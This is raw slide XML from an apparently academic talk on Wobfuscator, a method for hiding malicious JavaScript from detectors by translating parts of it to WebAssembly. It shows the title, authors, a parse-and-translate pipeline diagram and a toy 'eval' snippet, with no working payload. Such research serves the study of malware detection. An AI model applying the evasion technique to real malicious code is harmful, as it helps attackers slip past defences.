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6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Lst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Inconsolata" pitchFamily="1" charset="0"/>
      <p:regular r:id="rId61"/>
      <p:bold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842F14-65A5-4413-9061-7BFCEAB78F2E}">
  <a:tblStyle styleId="{19842F14-65A5-4413-9061-7BFCEAB78F2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b="off" i="off"/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="CDD8FB"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1H>
    <a:band2H>
      <a:tcTxStyle b="off" i="off"/>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:band2H>
    <a:band1V>
      <a:tcTxStyle b="off" i="off"/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="CDD8F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79" y="4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6944" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="16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6944" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="16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6944" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="16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6944" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="16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914400" lvl="1" indent="-22860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9" name="Google Shape;51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8" name="Google Shape;53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1" name="Google Shape;55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4" name="Google Shape;56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7" name="Google Shape;57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914400" lvl="1" indent="-22860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6" name="Google Shape;60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2" name="Google Shape;62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7" name="Google Shape;66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3" name="Google Shape;683;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7" name="Google Shape;69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5" name="Google Shape;715;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5" name="Google Shape;73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2" name="Google Shape;75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0" name="Google Shape;770;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7" name="Google Shape;807;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6" name="Google Shape;82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7" name="Google Shape;84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5" name="Google Shape;855;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2" name="Google Shape;86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9" name="Google Shape;869;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7" name="Google Shape;877;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7" name="Google Shape;88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7" name="Google Shape;897;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3" name="Google Shape;903;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0" name="Google Shape;910;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7" name="Google Shape;917;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3" name="Google Shape;923;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9" name="Google Shape;929;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5" name="Google Shape;935;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1" name="Google Shape;941;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
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p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5" name="Google Shape;5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2" name="Google Shape;62;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3" name="Google Shape;6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9" name="Google Shape;69;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70" name="Google Shape;7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4" name="Google Shape;74;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5" name="Google Shape;7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8" name="Google Shape;7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1" name="Google Shape;81;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9" name="Google Shape;89;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0" name="Google Shape;90;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91" name="Google Shape;9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94" name="Google Shape;9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7" name="Google Shape;97;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8" name="Google Shape;9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4" name="Google Shape;3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8" name="Google Shape;5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3600" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Wobfuscator: Obfuscating JavaScript Malware via Opportunistic Translation to WebAssembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2995944"/>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1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alan Romano	Daniel Lehmann	Michael Pradel	Weihang Wang</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Google Shape;107;p26" descr="Text&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082690" y="3918832"/>
            <a:ext cx="3161673" cy="417341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="Google Shape;108;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4392029" y="3057752"/>
            <a:ext cx="4050597" cy="2032454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214395" y="3303571"/>
            <a:ext cx="8520600" cy="3354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chemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alanroma@buffalo.edu		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>mail@dlehmann.eu		michael@binaervarianz.de	weihangw@buffalo.edu</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="777777"/>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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9916" y="3657600"/>
            <a:ext cx="139124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Input: Malicious</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2567121" y="2194949"/>
            <a:ext cx="1076352" cy="1081908"/>
            <a:chOff x="2635711" y="1315735"/>
            <a:chExt cx="1435136" cy="1442544"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Google Shape;315;p35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3350847" y="1315735"/>
              <a:ext cx="360000" cy="360000"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:no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16" name="Google Shape;316;p35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990847" y="1857007"/>
              <a:ext cx="360000" cy="360000"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:no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17" name="Google Shape;317;p35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2635711" y="2398279"/>
              <a:ext cx="360000" cy="360000"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18" name="Google Shape;318;p35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3350847" y="2398279"/>
              <a:ext cx="360000" cy="360000"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:no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19" name="Google Shape;319;p35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3710847" y="1857007"/>
              <a:ext cx="360000" cy="360000"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:no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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="320" name="Google Shape;320;p35"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="315" idx="3"/>
              <a:endCxn id="316" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3170768" y="1623014"/>
              <a:ext cx="232800" cy="234000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="321" name="Google Shape;321;p35"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="316" idx="3"/>
              <a:endCxn id="317" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2815568" y="2164286"/>
              <a:ext cx="228000" cy="234000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="322" name="Google Shape;322;p35"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="316" idx="5"/>
              <a:endCxn id="318" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3298126" y="2164286"/>
              <a:ext cx="232800" cy="234000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="323" name="Google Shape;323;p35"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="315" idx="5"/>
              <a:endCxn id="319" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3658126" y="1623014"/>
              <a:ext cx="232800" cy="234000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194160" y="2160518"/>
            <a:ext cx="861428" cy="960437"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="81000" tIns="108000" rIns="27000" bIns="4570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1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> foo = </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>  "evil";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="325" name="Google Shape;325;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="137010" y="2859786"/>
            <a:ext cx="371475" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1582641" y="2646226"/>
            <a:ext cx="486000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2646430" y="3709325"/>
            <a:ext cx="125178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JavaScript AST</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="328" name="Google Shape;328;p35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329000" y="2646226"/>
            <a:ext cx="486000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317777" y="2546161"/>
            <a:ext cx="381392" cy="381392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EF8600"/>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30" name="Google Shape;330;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342539" y="2321839"/>
            <a:ext cx="81137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1. Parse</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Google Shape;331;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533619" y="1423325"/>
            <a:ext cx="1954779"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2. Identify potential</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Translation Site</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="332" name="Google Shape;332;p35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3508473" y="2002208"/>
            <a:ext cx="115347" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EF8600"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;333;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820474" y="2167948"/>
            <a:ext cx="270000" cy="270000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:no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34" name="Google Shape;334;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5550474" y="2573902"/>
            <a:ext cx="270000" cy="270000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:no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35" name="Google Shape;335;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5284118" y="2979856"/>
            <a:ext cx="270000" cy="270000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:no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36" name="Google Shape;336;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820474" y="2979856"/>
            <a:ext cx="270000" cy="270000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:no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37" name="Google Shape;337;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6090474" y="2573902"/>
            <a:ext cx="270000" cy="270000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:no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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="333" idx="3"/>
            <a:endCxn id="334" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5685415" y="2398407"/>
            <a:ext cx="174600" cy="175500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7F7F7F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="339" name="Google Shape;339;p35"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="335" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5419118" y="2804356"/>
            <a:ext cx="171000" cy="175500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7F7F7F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="340" name="Google Shape;340;p35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="334" idx="5"/>
            <a:endCxn id="336" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5780933" y="2804361"/>
            <a:ext cx="174600" cy="175500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7F7F7F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="333" idx="5"/>
            <a:endCxn id="337" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6050933" y="2398407"/>
            <a:ext cx="174600" cy="175500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7F7F7F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;342;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6090474" y="2570135"/>
            <a:ext cx="270000" cy="270000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
